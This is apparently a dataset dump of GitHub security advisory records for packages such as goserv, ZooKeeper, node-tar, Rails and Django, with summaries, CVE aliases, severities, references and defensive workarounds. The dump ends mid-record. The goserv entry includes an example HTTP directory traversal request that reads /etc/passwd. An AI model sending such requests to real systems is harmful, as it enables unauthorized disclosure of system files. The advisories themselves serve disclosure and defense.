ecosystem
stringclasses
14 values
vuln_id
stringlengths
10
19
summary
stringlengths
4
267
details
stringlengths
9
13.5k
aliases
stringlengths
17
144
modified_date
stringdate
2010-05-27 05:47:00
2022-05-10 08:46:52
published_date
stringdate
2005-12-31 05:00:00
2022-05-10 08:46:50
severity
stringclasses
5 values
score
float64
0
10
cwe_id
stringclasses
988 values
refs
stringlengths
30
17.7k
introduced
stringlengths
75
4.26k
GHSA
GHSA-pwqj-h62h-q35c
Directory Traversal in goserv
Affected versions of `goserv` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system. Example request: ``` GET /../../../../../../../../../../etc/passwd HTTP/1.1 host:foo ``` ## Recommendation No patch is available for this vulnerability. It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.
{'CVE-2017-16133'}
2021-01-08T18:18:56Z
2018-07-23T20:49:03Z
HIGH
0
{'CWE-22'}
{'https://nvd.nist.gov/vuln/detail/CVE-2017-16133', 'https://github.com/advisories/GHSA-pwqj-h62h-q35c', 'https://github.com/JacksonGL/NPM-Vuln-PoC/blob/master/directory-traversal/goserv', 'https://nodesecurity.io/advisories/473', 'https://www.npmjs.com/advisories/473'}
null
GHSA
GHSA-6hw5-6gcx-phmw
HashiCorp Consul and Consul Enterprise 1.10.1 Txn.Apply endpoint allowed services to register proxies for other services, enabling access to service traffic.
HashiCorp Consul and Consul Enterprise 1.10.1 Txn.Apply endpoint allowed services to register proxies for other services, enabling access to service traffic. Fixed in 1.8.15, 1.9.9 and 1.10.2.
{'CVE-2021-38698'}
2021-09-16T18:57:25Z
2021-09-08T20:14:56Z
MODERATE
6.5
{'CWE-863'}
{'https://discuss.hashicorp.com/t/hcsec-2021-24-consul-missing-authorization-check-on-txn-apply-endpoint/29026', 'https://github.com/hashicorp/consul/pull/10824', 'https://www.hashicorp.com/blog/category/consul', 'https://nvd.nist.gov/vuln/detail/CVE-2021-38698', 'https://github.com/advisories/GHSA-6hw5-6gcx-phmw'}
null
GHSA
GHSA-2hw2-62cp-p9p7
Access control bypass in Apache ZooKeeper
An issue is present in Apache ZooKeeper 1.0.0 to 3.4.13 and 3.5.0-alpha to 3.5.4-beta. ZooKeeper?s getACL() command doesn?t check any permission when retrieves the ACLs of the requested node and returns all information contained in the ACL Id field as plaintext string. DigestAuthenticationProvider overloads the Id field with the hash value that is used for user authentication. As a consequence, if Digest Authentication is in use, the unsalted hash value will be disclosed by getACL() request for unauthenticated or unprivileged users.
{'CVE-2019-0201'}
2021-08-26T15:35:13Z
2019-05-29T18:54:11Z
MODERATE
5.9
{'CWE-862'}
{'https://lists.apache.org/thread.html/5d9a1cf41a5880557bf680b7321b4ab9a4d206c601ffb15fef6f196a@%3Ccommits.accumulo.apache.org%3E', 'https://lists.apache.org/thread.html/r40f32125c1d97ad82404cc918171d9e0fcf78e534256674e9da1eb4b@%3Ccommon-issues.hadoop.apache.org%3E', 'https://security.netapp.com/advisory/ntap-20190619-0001/', 'https://nvd.nist.gov/vuln/detail/CVE-2019-0201', 'https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3Cissues.drill.apache.org%3E', 'https://www.oracle.com/security-alerts/cpujul2020.html', 'https://zookeeper.apache.org/security.html#CVE-2019-0201', 'https://github.com/advisories/GHSA-2hw2-62cp-p9p7', 'https://seclists.org/bugtraq/2019/Jun/13', 'https://lists.apache.org/thread.html/f6112882e30a31992a79e0a8c31ac179e9d0de7c708de3a9258d4391@%3Cissues.bookkeeper.apache.org%3E', 'https://access.redhat.com/errata/RHSA-2019:3892', 'https://lists.debian.org/debian-lts-announce/2019/05/msg00033.html', 'https://www.oracle.com//security-alerts/cpujul2021.html', 'https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3Cdev.drill.apache.org%3E', 'https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@%3Cdev.drill.apache.org%3E', 'https://www.debian.org/security/2019/dsa-4461', 'https://access.redhat.com/errata/RHSA-2019:4352', 'https://access.redhat.com/errata/RHSA-2019:3140', 'https://lists.apache.org/thread.html/053d9ce4d579b02203db18545fee5e33f35f2932885459b74d1e4272@%3Cissues.activemq.apache.org%3E', 'https://www.oracle.com/security-alerts/cpuoct2020.html', 'http://www.securityfocus.com/bid/108427', 'https://issues.apache.org/jira/browse/ZOOKEEPER-1392'}
null
GHSA
GHSA-q8pj-2vqx-8ggc
Denial of service in css-what
The css-what package 4.0.0 through 5.0.0 for Node.js does not ensure that attribute parsing has Linear Time Complexity relative to the size of the input.
{'CVE-2021-33587'}
2021-12-02T17:48:50Z
2021-06-07T22:11:39Z
HIGH
7.5
{'CWE-400'}
{'https://nvd.nist.gov/vuln/detail/CVE-2021-33587', 'https://security.netapp.com/advisory/ntap-20210706-0007/', 'https://github.com/fb55/css-what/commit/4cdaacfd0d4b6fd00614be030da0dea6c2994655', 'https://github.com/advisories/GHSA-q8pj-2vqx-8ggc', 'https://github.com/fb55/css-what/releases/tag/v5.0.1'}
null
GHSA
GHSA-85r7-w5mv-c849
Moderate severity vulnerability that affects rack
rack/file.rb (Rack::File) in Rack 1.5.x before 1.5.2 and 1.4.x before 1.4.5 allows attackers to access arbitrary files outside the intended root directory via a crafted PATH_INFO environment variable, probably a directory traversal vulnerability that is remotely exploitable, aka "symlink path traversals."
{'CVE-2013-0262'}
2021-09-03T22:59:00Z
2017-10-24T18:33:37Z
MODERATE
0
{'CWE-22'}
{'https://github.com/rack/rack/commit/6f237e4c9fab649d3750482514f0fde76c56ab30', 'https://bugzilla.redhat.com/show_bug.cgi?id=909071', 'https://bugzilla.redhat.com/show_bug.cgi?id=909072', 'https://nvd.nist.gov/vuln/detail/CVE-2013-0262', 'https://gist.github.com/rentzsch/4736940', 'https://github.com/advisories/GHSA-85r7-w5mv-c849', 'https://groups.google.com/forum/#!msg/rack-devel/bf937jPZxJM/1s6x95vIhmAJ', 'http://secunia.com/advisories/52033', 'https://groups.google.com/forum/#!msg/rack-devel/mZsuRonD7G8/DpZIOmMLbOgJ', 'http://lists.opensuse.org/opensuse-updates/2013-03/msg00048.html', 'https://github.com/rack/rack/blob/master/lib/rack/file.rb#L56', 'http://rack.github.com/'}
null
GHSA
GHSA-gp6w-ccqv-p7qr
firefly-iii is vulnerable to Cross-Site Request Forgery (CSRF)
firefly-iii is vulnerable to Cross-Site Request Forgery (CSRF)
{'CVE-2021-3729'}
2021-08-25T14:49:58Z
2021-08-25T14:49:58Z
MODERATE
4.3
{'CWE-352'}
{'https://github.com/firefly-iii/firefly-iii/commit/06d319cd71b7787aa919b3ba1ccf51e4ade67712', 'https://nvd.nist.gov/vuln/detail/CVE-2021-3729', 'https://github.com/advisories/GHSA-gp6w-ccqv-p7qr', 'https://huntr.dev/bounties/d32f3d5a-0738-41ba-89de-34f2a772de76'}
null
GHSA
GHSA-mh33-7rrq-662w
Improper Certificate Validation
The urllib3 library before 1.24.2 for Python mishandles certain cases where the desired set of CA certificates is different from the OS store of CA certificates, which results in SSL connections succeeding in situations where a verification failure is the correct outcome. This is related to use of the ssl_context, ca_certs, or ca_certs_dir argument.
{'CVE-2019-11324'}
2021-06-16T19:56:58Z
2019-04-19T16:55:10Z
HIGH
7.5
{'CWE-295'}
{'https://github.com/urllib3/urllib3/compare/a6ec68a...1efadf4', 'https://access.redhat.com/errata/RHSA-2019:3335', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XOSA2NT4DUQDBEIWE6O7KKD24XND7TE2/', 'https://lists.debian.org/debian-lts-announce/2021/06/msg00015.html', 'https://pypi.org/project/urllib3/1.24.2/', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NKGPJLVLVYCL4L4B4G5TIOTVK4BKPG72/', 'http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00041.html', 'http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00039.html', 'https://access.redhat.com/errata/RHSA-2019:3590', 'http://www.openwall.com/lists/oss-security/2019/04/19/1', 'https://usn.ubuntu.com/3990-1/', 'https://nvd.nist.gov/vuln/detail/CVE-2019-11324', 'https://github.com/advisories/GHSA-mh33-7rrq-662w'}
null
GHSA
GHSA-7pr3-p5fm-8r9x
LiveQuery publishes user session tokens in parse-server
### Impact For regular (non-LiveQuery) queries, the session token is removed from the response, but for LiveQuery payloads it is currently not. If a user has a LiveQuery subscription on the `Parse.User` class, all session tokens created during user sign-ups will be broadcast as part of the LiveQuery payload. ### Patches Remove session token from LiveQuery payload. ### Workaround Set `user.acl(new Parse.ACL())` in a beforeSave trigger to make the user private already on sign-up.
{'CVE-2021-41109'}
2022-04-19T19:03:10Z
2021-09-30T17:09:47Z
HIGH
7.5
{'CWE-200'}
{'https://github.com/parse-community/parse-server/releases/tag/4.10.4', 'https://github.com/advisories/GHSA-7pr3-p5fm-8r9x', 'https://github.com/parse-community/parse-server/security/advisories/GHSA-7pr3-p5fm-8r9x', 'https://nvd.nist.gov/vuln/detail/CVE-2021-41109', 'https://github.com/parse-community/parse-server/commit/4ac4b7f71002ed4fbedbb901db1f6ed1e9ac5559'}
null
GHSA
GHSA-v5m7-53cv-f3hx
Undefined Behavior crossbeam-channel
### Impact The affected version of this crate's the `bounded` channel incorrectly assumes that `Vec::from_iter` has allocated capacity that same as the number of iterator elements. `Vec::from_iter` does not actually guarantee that and may allocate extra memory. The destructor of the `bounded` channel reconstructs `Vec` from the raw pointer based on the incorrect assumes described above. This is unsound and causing deallocation with the incorrect capacity when `Vec::from_iter` has allocated different sizes with the number of iterator elements. ### Patches This has been fixed in crossbeam-channel 0.4.4. We recommend users to upgrade to 0.4.4. ### References See https://github.com/crossbeam-rs/crossbeam/pull/533, https://github.com/crossbeam-rs/crossbeam/issues/539, and https://github.com/RustSec/advisory-db/pull/425 for more details.
{'CVE-2020-15254'}
2021-12-17T19:38:01Z
2021-08-25T21:01:13Z
HIGH
8.1
{'CWE-119'}
{'https://github.com/crossbeam-rs/crossbeam/pull/533', 'https://nvd.nist.gov/vuln/detail/CVE-2020-15254', 'https://github.com/advisories/GHSA-v5m7-53cv-f3hx', 'https://github.com/crossbeam-rs/crossbeam/security/advisories/GHSA-v5m7-53cv-f3hx', 'https://github.com/RustSec/advisory-db/pull/425', 'https://github.com/crossbeam-rs/crossbeam/issues/539', 'https://rustsec.org/advisories/RUSTSEC-2020-0052.html'}
null
GHSA
GHSA-9r2w-394v-53qc
Arbitrary File Creation/Overwrite via insufficient symlink protection due to directory cache poisoning using symbolic links
### Impact Arbitrary File Creation, Arbitrary File Overwrite, Arbitrary Code Execution `node-tar` aims to guarantee that any file whose location would be modified by a symbolic link is not extracted. This is, in part, achieved by ensuring that extracted directories are not symlinks. Additionally, in order to prevent unnecessary stat calls to determine whether a given path is a directory, paths are cached when directories are created. This logic was insufficient when extracting tar files that contained both a directory and a symlink with the same name as the directory, where the symlink and directory names in the archive entry used backslashes as a path separator on posix systems. The cache checking logic used both `\` and `/` characters as path separators, however `\` is a valid filename character on posix systems. By first creating a directory, and then replacing that directory with a symlink, it was thus possible to bypass node-tar symlink checks on directories, essentially allowing an untrusted tar file to symlink into an arbitrary location and subsequently extracting arbitrary files into that location, thus allowing arbitrary file creation and overwrite. Additionally, a similar confusion could arise on case-insensitive filesystems. If a tar archive contained a directory at `FOO`, followed by a symbolic link named `foo`, then on case-insensitive file systems, the creation of the symbolic link would remove the directory from the filesystem, but _not_ from the internal directory cache, as it would not be treated as a cache hit. A subsequent file entry within the `FOO` directory would then be placed in the target of the symbolic link, thinking that the directory had already been created. These issues were addressed in releases 4.4.16, 5.0.8 and 6.1.7. The v3 branch of `node-tar` has been deprecated and did not receive patches for these issues. If you are still using a v3 release we recommend you update to a more recent version of `node-tar`. If this is not possible, a workaround is available below. ### Patches 4.4.16 || 5.0.8 || 6.1.7 ### Workarounds Users may work around this vulnerability without upgrading by creating a custom filter method which prevents the extraction of symbolic links. ```js const tar = require('tar') tar.x({ file: 'archive.tgz', filter: (file, entry) => { if (entry.type === 'SymbolicLink') { return false } else { return true } } }) ``` Users are encouraged to upgrade to the latest patched versions, rather than attempt to sanitize tar input themselves. ### Fix The problem is addressed in the following ways: 1. All paths are normalized to use `/` as a path separator, replacing `\` with `/` on Windows systems, and leaving `\` intact in the path on posix systems. This is performed in depth, at every level of the program where paths are consumed. 2. Directory cache pruning is performed case-insensitively. This _may_ result in undue cache misses on case-sensitive file systems, but the performance impact is negligible. #### Caveat Note that this means that the `entry` objects exposed in various parts of tar's API will now always use `/` as a path separator, even on Windows systems. This is not expected to cause problems, as `/` is a valid path separator on Windows systems, but _may_ result in issues if `entry.path` is compared against a path string coming from some other API such as `fs.realpath()` or `path.resolve()`. Users are encouraged to always normalize paths using a well-tested method such as `path.resolve()` before comparing paths to one another.
{'CVE-2021-37701'}
2022-03-11T20:20:35Z
2021-08-31T16:05:27Z
HIGH
8.2
{'CWE-59', 'CWE-22'}
{'https://www.npmjs.com/package/tar', 'https://github.com/npm/node-tar/security/advisories/GHSA-9r2w-394v-53qc', 'https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf', 'https://www.debian.org/security/2021/dsa-5008', 'https://nvd.nist.gov/vuln/detail/CVE-2021-37701', 'https://www.oracle.com/security-alerts/cpuoct2021.html', 'https://github.com/advisories/GHSA-9r2w-394v-53qc'}
null
GHSA
GHSA-ghm8-mmx7-xvg2
Information Exposure in Apache Tapestry
Information Exposure vulnerability in context asset handling of Apache Tapestry allows an attacker to download files inside WEB-INF if using a specially-constructed URL. This was caused by an incomplete fix for CVE-2020-13953. This issue affects Apache Tapestry Apache Tapestry 5.4.0 version to Apache Tapestry 5.6.3; Apache Tapestry 5.7.0 version and Apache Tapestry 5.7.1.
{'CVE-2021-30638'}
2022-03-21T20:43:26Z
2022-03-18T17:53:58Z
HIGH
7.5
{'CWE-200'}
{'http://www.openwall.com/lists/oss-security/2021/04/27/3', 'https://lists.apache.org/thread.html/r37dab61fc7f7088d4311e7f995ef4117d58d86a675f0256caa6991eb%40%3Cusers.tapestry.apache.org%3E', 'https://security.netapp.com/advisory/ntap-20210528-0004/', 'https://github.com/advisories/GHSA-ghm8-mmx7-xvg2', 'https://nvd.nist.gov/vuln/detail/CVE-2021-30638', 'https://www.zerodayinitiative.com/advisories/ZDI-21-491/'}
null
GHSA
GHSA-mm44-wc5p-wqhq
Denial of service due to reference expansion in versions earlier than 4.0
### Impact The CBOR library supports optional tags that enable CBOR objects to contain references to objects within them. Versions earlier than 4.0 resolved those references automatically. While this by itself doesn't cause much of a security problem, a denial of service can happen if those references are deeply nested and used multiple times (so that the same reference to the same object occurs multiple times), and if the decoded CBOR object is sent to a serialization method such as EncodeToBytes, ToString, or ToJSONString, since the objects referred to are expanded in the process and take up orders of magnitude more memory than if the references weren't resolved. The impact of this problem on any particular system varies. In general, the risk is higher if the system allows users to send arbitrary CBOR objects without authentication, or exposes a remote endpoint in which arbitrary CBOR objects can be sent without authentication. ### Patches This problem is addressed in version 4.0 by disabling reference resolution by default. Users should use the latest version of this library. ### Workarounds Since version 3.6, an encoding option (`resolvereferences=true` or `resolvereferences=false`) in CBOREncodeOptions sets whether the CBOR processor will resolve these kinds of references when decoding a CBOR object. Set `resolvereferences=false` to disable reference resolution. In version 3.6, if the method used CBORObject.Read() or CBORObject.DecodeFromBytes() to decode a serialized CBOR object, call the overload that takes CBOREncodeOptions as follows: CBORObject.DecodeFromBytes(bytes, new CBOREncodeOptions("resolvereferences=false")); In versions 3.5 and earlier, this issue is present only if the CBOR object is an array or a map. If the application does not expect a decoded CBOR object to be an array or a map, it should check the CBOR object's type before encoding that object, as follows: if (cbor.Type != CBORType.Array && cbor.Type != CBORType.Map) { cbor.EncodeToBytes(); } Alternatively, for such versions, the application can use WriteTo to decode the CBOR object to a so-called "limited memory stream", that is, a Stream that throws an exception if too many bytes would be written. How to write such a limited-memory stream is nontrivial and beyond the scope of this advisory. LimitedMemoryStream stream = new LimitedMemoryStream(100000); // Limit to 100000 bytes cbor.WriteTo(stream); return stream.ToBytes(); To check whether a byte array representing a CBOR object might exhibit this problem, check whether the array contains the byte 0xd8 followed immediately by either 0x19 or 0x1d. This check catches all affected CBOR objects but may catch some non-affected CBOR objects (notably integers and byte strings). ### References See the Wikipedia article [Billion laughs attack](https://en.wikipedia.org/wiki/Billion_laughs_attack) and the related issue in [Kubernetes](https://github.com/kubernetes/kubernetes/issues/83253). ### For more information If you have any questions or comments about this advisory, open an issue in [the CBOR repository](https://github.com/peteroupc/cbor-java).
null
2022-01-18T23:05:19Z
2020-07-07T16:45:24Z
HIGH
0
null
{'https://github.com/peteroupc/CBOR-Java/security/advisories/GHSA-mm44-wc5p-wqhq', 'https://github.com/advisories/GHSA-mm44-wc5p-wqhq'}
null
GHSA
GHSA-hv53-q76c-7f8c
OS Command Injection in OpenTSDB
A remote code execution vulnerability occurs in OpenTSDB through 2.4.0 via command injection in the yrange parameter. The yrange value is written to a gnuplot file in the /tmp directory. This file is then executed via the mygnuplot.sh shell script. (tsd/GraphHandler.java attempted to prevent command injections by blocking backticks but this is insufficient.)
{'CVE-2020-35476'}
2021-08-02T17:02:21Z
2021-08-02T17:02:21Z
CRITICAL
9.8
{'CWE-78'}
{'https://nvd.nist.gov/vuln/detail/CVE-2020-35476', 'https://github.com/OpenTSDB/opentsdb/issues/2051', 'https://github.com/advisories/GHSA-hv53-q76c-7f8c'}
null
GHSA
GHSA-wcp5-m52f-mhh5
Improper Restriction of XML External Entity Reference in MPXJ
"MPXJ through 8.1.3 allows XXE attacks. This affects the GanttProjectReader and PhoenixReader components."
{'CVE-2020-25020'}
2021-05-07T15:54:36Z
2021-05-07T15:54:36Z
CRITICAL
9.8
{'CWE-611'}
{'https://www.oracle.com/security-alerts/cpujan2021.html', 'https://github.com/advisories/GHSA-wcp5-m52f-mhh5', 'https://github.com/joniles/mpxj/releases/tag/v8.1.4', 'https://github.com/joniles/mpxj/pull/178/commits/c3e457f7a16facfe563eade82b0fa8736a8c96f9', 'https://nvd.nist.gov/vuln/detail/CVE-2020-25020'}
null
GHSA
GHSA-wh98-p28r-vrc9
Exposure of information in Action Pack
### Impact Under certain circumstances response bodies will not be closed, for example a [bug in a webserver](https://github.com/puma/puma/pull/2812) or a bug in a Rack middleware. In the event a response is *not* notified of a `close`, `ActionDispatch::Executor` will not know to reset thread local state for the next request. This can lead to data being leaked to subsequent requests, especially when interacting with `ActiveSupport::CurrentAttributes`. Upgrading to the FIXED versions of Rails will ensure mitigation of this issue even in the context of a buggy webserver or middleware implementation. ### Patches This has been fixed in Rails 7.0.2.2, 6.1.4.6, 6.0.4.6, and 5.2.6.2. ### Workarounds Upgrading is highly recommended, but to work around this problem the following middleware can be used: ```ruby class GuardedExecutor < ActionDispatch::Executor def call(env) ensure_completed! super end private def ensure_completed! @executor.new.complete! if @executor.active? end end # Ensure the guard is inserted before ActionDispatch::Executor Rails.application.configure do config.middleware.swap ActionDispatch::Executor, GuardedExecutor, executor end ```
{'CVE-2022-23633'}
2022-04-19T19:03:23Z
2022-02-11T20:49:14Z
HIGH
7.4
{'CWE-200'}
{'https://nvd.nist.gov/vuln/detail/CVE-2022-23633', 'https://github.com/advisories/GHSA-wh98-p28r-vrc9', 'https://rubyonrails.org/2022/2/11/Rails-7-0-2-2-6-1-4-6-6-0-4-6-and-5-2-6-2-have-been-released', 'https://github.com/rails/rails/security/advisories/GHSA-wh98-p28r-vrc9', 'https://discuss.rubyonrails.org/t/cve-2022-23633-possible-exposure-of-information-vulnerability-in-action-pack/80016', 'http://www.openwall.com/lists/oss-security/2022/02/11/5', 'https://github.com/rails/rails/commit/f9a2ad03943d5c2ba54e1d45f155442b519c75da'}
null
GHSA
GHSA-868x-rg4c-cjqg
Allocation of Resources Without Limits or Throttling in Apache Avro
A vulnerability in the .NET SDK of Apache Avro allows an attacker to allocate excessive resources, potentially causing a denial-of-service attack. This issue affects .NET applications using Apache Avro version 1.10.2 and prior versions. Users should update to version 1.11.0 which addresses this issue.
{'CVE-2021-43045'}
2022-01-18T22:41:05Z
2022-01-08T00:39:20Z
HIGH
7.5
{'CWE-770'}
{'https://nvd.nist.gov/vuln/detail/CVE-2021-43045', 'http://www.openwall.com/lists/oss-security/2022/01/06/8', 'https://lists.apache.org/thread/5fttw9vk6gd2p3b846nox7hcj5469xfd', 'https://github.com/advisories/GHSA-868x-rg4c-cjqg'}
null
GHSA
GHSA-j52m-489x-v634
Double free in linea
An issue was discovered in the linea crate through 0.9.4 for Rust. There is double free in the Matrix::zip_elements method.
{'CVE-2019-16880'}
2021-08-25T20:44:13Z
2021-08-25T20:44:13Z
CRITICAL
9.8
{'CWE-415'}
{'https://nvd.nist.gov/vuln/detail/CVE-2019-16880', 'https://github.com/advisories/GHSA-j52m-489x-v634', 'https://rustsec.org/advisories/RUSTSEC-2019-0021.html', 'https://github.com/strake/linea.rs/issues/2'}
null
GHSA
GHSA-g973-978j-2c3p
Denial of Service in SheetJS Pro
SheetJS Pro through 0.16.9 allows attackers to cause a denial of service (CPU consumption) via a crafted .xlsx document that is mishandled when read by xlsx.js.
{'CVE-2021-32014'}
2022-02-08T21:02:27Z
2021-07-22T19:47:15Z
MODERATE
5.5
{'CWE-400', 'CWE-345'}
{'https://nvd.nist.gov/vuln/detail/CVE-2021-32014', 'https://github.com/advisories/GHSA-g973-978j-2c3p', 'https://sheetjs.com/pro', 'https://floqast.com/engineering-blog/post/fuzzing-and-parsing-securely/', 'https://www.npmjs.com/package/xlsx/v/0.17.0', 'https://www.oracle.com/security-alerts/cpujan2022.html'}
null
GHSA
GHSA-vjrq-cg9x-rfjp
Improper Input Validation in cookie
An issue was discovered in the cookie crate before 0.7.6 for Rust. Large integers in the Max-Age of a cookie cause a panic.
{'CVE-2017-18589'}
2021-08-25T20:43:02Z
2021-08-25T20:43:02Z
HIGH
7.5
{'CWE-20'}
{'https://github.com/alexcrichton/cookie-rs/pull/86', 'https://rustsec.org/advisories/RUSTSEC-2017-0005.html', 'https://github.com/advisories/GHSA-vjrq-cg9x-rfjp', 'https://nvd.nist.gov/vuln/detail/CVE-2017-18589'}
null
GHSA
GHSA-49fq-pw77-6qxj
Use after free in string-interner
An issue was discovered in the string-interner crate before 0.7.1 for Rust. It allows attackers to read from memory locations associated with dangling pointers, because of a cloning flaw.
{'CVE-2019-16882'}
2021-08-25T20:44:15Z
2021-08-25T20:44:15Z
HIGH
7.5
{'CWE-416'}
{'https://github.com/Robbepop/string-interner/issues/9', 'https://github.com/advisories/GHSA-49fq-pw77-6qxj', 'https://nvd.nist.gov/vuln/detail/CVE-2019-16882', 'https://rustsec.org/advisories/RUSTSEC-2019-0023.html'}
null
GHSA
GHSA-5jcf-c5rg-rmm8
High severity vulnerability that affects paperclip
Paperclip ruby gem version 3.1.4 and later suffers from a Server-SIde Request Forgery (SSRF) vulnerability in the Paperclip::UriAdapter class. Attackers may be able to access information about internal network resources.
{'CVE-2017-0889'}
2021-01-08T19:50:02Z
2018-01-22T13:31:34Z
HIGH
0
{'CWE-918'}
{'https://github.com/thoughtbot/paperclip/pull/2435', 'https://hackerone.com/reports/713', 'https://nvd.nist.gov/vuln/detail/CVE-2017-0889', 'https://hackerone.com/reports/209430', 'https://github.com/advisories/GHSA-5jcf-c5rg-rmm8'}
null
GHSA
GHSA-hx6g-q9v2-xh7v
Information exposure in elgg
elgg is vulnerable to Exposure of Private Personal Information to an Unauthorized Actor. Forms in the view namespace 'forms/admin' were not protected by an AdminGatekeeper in case of AJAX requests to 'ajax/form/admin/'.
{'CVE-2021-3980'}
2021-12-16T15:30:48Z
2021-12-16T15:30:48Z
HIGH
7.5
{'CWE-359'}
{'https://github.com/Elgg/Elgg/pull/13791', 'https://github.com/elgg/elgg/commit/572d210e2392f1fdf47ff2f38665372a6535c126', 'https://github.com/advisories/GHSA-hx6g-q9v2-xh7v', 'https://nvd.nist.gov/vuln/detail/CVE-2021-3980', 'https://huntr.dev/bounties/1f43f11e-4bd8-451f-a244-dc9541cdc0ac'}
null
GHSA
GHSA-mv2w-4jqc-6fg4
Command injection in libvcs and vcspull
The package libvcs before 0.11.1 are vulnerable to Command Injection via argument injection. When calling the update_repo function (when using hg), the url parameter is passed to the hg clone command. By injecting some hg options it was possible to get arbitrary command execution.
{'CVE-2022-21187'}
2022-04-04T21:38:53Z
2022-03-15T00:00:53Z
HIGH
8.1
{'CWE-74', 'CWE-77'}
{'https://github.com/vcs-python/vcspull/blob/master/CHANGES#vcspull-1111-2022-03-12', 'https://github.com/vcs-python/libvcs/blob/master/CHANGES#libvcs-0111-2022-03-12', 'https://github.com/vcs-python/vcspull/commit/e1b77128a1fa0754625b5f43d8bc47956f21f33e', 'https://github.com/advisories/GHSA-mv2w-4jqc-6fg4', 'https://snyk.io/vuln/SNYK-PYTHON-LIBVCS-2421204', 'https://github.com/vcs-python/libvcs/pull/306', 'https://github.com/vcs-python/libvcs/blob/v0.11.1/CHANGES%23libvcs-0111-2022-03-12', 'https://nvd.nist.gov/vuln/detail/CVE-2022-21187'}
null
GHSA
GHSA-xg75-q3q5-cqmv
Denial of Service in http-swagger
### Impact Allows an attacker to perform a DOS attack consisting of memory exhaustion on the host system. ### Patches Yes. Please upgrade to v1.2.6. ### Workarounds A workaround is to restrict the path prefix to the "GET" method. As shown below ``` func main() { r := mux.NewRouter() r.PathPrefix("/swagger/").Handler(httpSwagger.Handler( httpSwagger.URL("http://localhost:1323/swagger/doc.json"), //The url pointing to API definition httpSwagger.DeepLinking(true), httpSwagger.DocExpansion("none"), httpSwagger.DomID("#swagger-ui"), )).Methods(http.MethodGet) ``` ### References Reporter dongguangli from https://www.huoxian.cn/ company ### For more information If you have any questions or comments about this advisory: * Open an issue in [http-swagger](https://github.com/swaggo/http-swagger/issues)
{'CVE-2022-24863'}
2022-04-28T18:12:34Z
2022-04-22T20:55:52Z
HIGH
7.5
{'CWE-400', 'CWE-755'}
{'https://github.com/swaggo/http-swagger/pull/62', 'https://nvd.nist.gov/vuln/detail/CVE-2022-24863', 'https://github.com/swaggo/http-swagger/commit/b7d83e8fba85a7a51aa7e45e8244b4173f15049e', 'https://github.com/swaggo/http-swagger/releases/tag/v1.2.6', 'https://github.com/swaggo/http-swagger/security/advisories/GHSA-xg75-q3q5-cqmv', 'https://github.com/advisories/GHSA-xg75-q3q5-cqmv'}
null
GHSA
GHSA-g74r-ffvr-5q9f
Memory Exposure in concat-stream
Versions of `concat-stream` before 1.5.2 are vulnerable to memory exposure if userp provided input is passed into `write()` Versions <1.3.0 are not affected due to not using unguarded Buffer constructor. ## Recommendation Update to version 1.5.2, 1.4.11, 1.3.2 or later. If you are unable to update make sure user provided input into the `write()` function is not a number.
null
2021-08-04T20:40:21Z
2019-06-03T17:26:44Z
MODERATE
0
{'CWE-200'}
{'https://github.com/maxogden/concat-stream/pull/47', 'https://nodesecurity.io/advisories/597', 'https://github.com/advisories/GHSA-g74r-ffvr-5q9f', 'https://gist.github.com/ChALkeR/c2d2fd3f1d72d51ad883df195be03a85', 'https://github.com/maxogden/concat-stream/pull/47/commits/3e285ba5e5b10b7c98552217f5c1023829efe69e', 'https://www.npmjs.com/advisories/597'}
null
GHSA
GHSA-2gwj-7jmv-h26r
SQL Injection in Django
An issue was discovered in Django 2.2 before 2.2.28, 3.2 before 3.2.13, and 4.0 before 4.0.4. QuerySet.annotate(), aggregate(), and extra() methods are subject to SQL injection in column aliases via a crafted dictionary (with dictionary expansion) as the passed **kwargs.
{'CVE-2022-28346'}
2022-04-22T23:29:02Z
2022-04-13T00:00:33Z
CRITICAL
9.8
{'CWE-89'}
{'https://www.djangoproject.com/weblog/2022/apr/11/security-releases/', 'https://github.com/django/django/commit/93cae5cb2f9a4ef1514cf1a41f714fef08005200', 'https://github.com/advisories/GHSA-2gwj-7jmv-h26r', 'http://www.openwall.com/lists/oss-security/2022/04/11/1', 'https://docs.djangoproject.com/en/4.0/releases/security/', 'https://nvd.nist.gov/vuln/detail/CVE-2022-28346', 'https://lists.debian.org/debian-lts-announce/2022/04/msg00013.html', 'https://groups.google.com/forum/#!forum/django-announce'}
null
GHSA
GHSA-8rcj-c8pj-v3m3
Reachable Assertion in Tensorflow
### Impact When decoding a resource handle tensor from protobuf, a TensorFlow process can encounter cases where a `CHECK` assertion is invalidated based on user controlled arguments. This allows attackers to cause denial of services in TensorFlow processes. ### Patches We have patched the issue in GitHub commit [14fea662350e7c26eb5fe1be2ac31704e5682ee6](https://github.com/tensorflow/tensorflow/commit/14fea662350e7c26eb5fe1be2ac31704e5682ee6). The fix will be included in TensorFlow 2.8.0. We will also cherrypick this commit on TensorFlow 2.7.1, TensorFlow 2.6.3, and TensorFlow 2.5.3, as these are also affected and still in supported range. ### For more information Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
{'CVE-2022-23564'}
2022-02-11T15:07:07Z
2022-02-09T23:55:28Z
MODERATE
6.5
{'CWE-617'}
{'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-8rcj-c8pj-v3m3', 'https://github.com/advisories/GHSA-8rcj-c8pj-v3m3', 'https://nvd.nist.gov/vuln/detail/CVE-2022-23564', 'https://github.com/tensorflow/tensorflow/commit/14fea662350e7c26eb5fe1be2ac31704e5682ee6'}
null
GHSA
GHSA-qw96-mm2g-c8m7
Next.js has cross site scripting (XSS) vulnerability via the 404 or 500 /_error page
Next.js 7.0.0 and 7.0.1 has XSS via the 404 or 500 /_error page.
{'CVE-2018-18282'}
2022-04-26T18:43:28Z
